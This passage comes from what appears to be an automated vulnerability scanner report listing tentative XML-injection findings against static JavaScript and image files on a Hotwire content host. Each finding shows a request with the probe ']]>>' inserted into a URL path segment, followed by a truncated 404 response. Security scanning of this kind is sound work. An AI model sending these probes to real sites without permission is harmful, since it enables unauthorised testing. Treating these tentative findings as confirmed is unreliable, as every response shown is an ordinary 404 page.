User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535994
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.34. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/core/comp/HwTilesComp.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/core/comp/HwTilesComp.js]]>>?ver=185918 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.35. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535945
Date: Mon, 03 Oct 2011 01:02:27 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.36. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/javascript/hotel/details/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535997
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.37. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript]]>>/hotel/details/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.38. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/hotel]]>>/details/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:39 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.39. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/hotel/details]]>>/HotelDetailsMapContainerComp.js?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:41 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.40. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js]]>>?ver=172705 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:43 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.41. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-book-now-large.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/buttons/btn-book-now-large.gif?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535950
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.42. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-book-now-large.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/buttons/btn-book-now-large.gif?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.43. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-book-now-large.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/buttons]]>>/btn-book-now-large.gif?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.44. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-book-now-large.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/buttons/btn-book-now-large.gif]]>>?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.45. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-submit2.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/buttons/btn-submit2.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.46. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-submit2.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/buttons/btn-submit2.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.47. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-submit2.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/buttons]]>>/btn-submit2.png?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.48. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/buttons/btn-submit2.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/buttons/btn-submit2.png]]>>?ver=222337 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:02 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.49. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/car-add-on/img-car-type-selector-OFF-new.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/car-add-on/img-car-type-selector-OFF-new.png?ver=193844 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.50. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/car-add-on/img-car-type-selector-OFF-new.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/car-add-on/img-car-type-selector-OFF-new.png?ver=193844 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
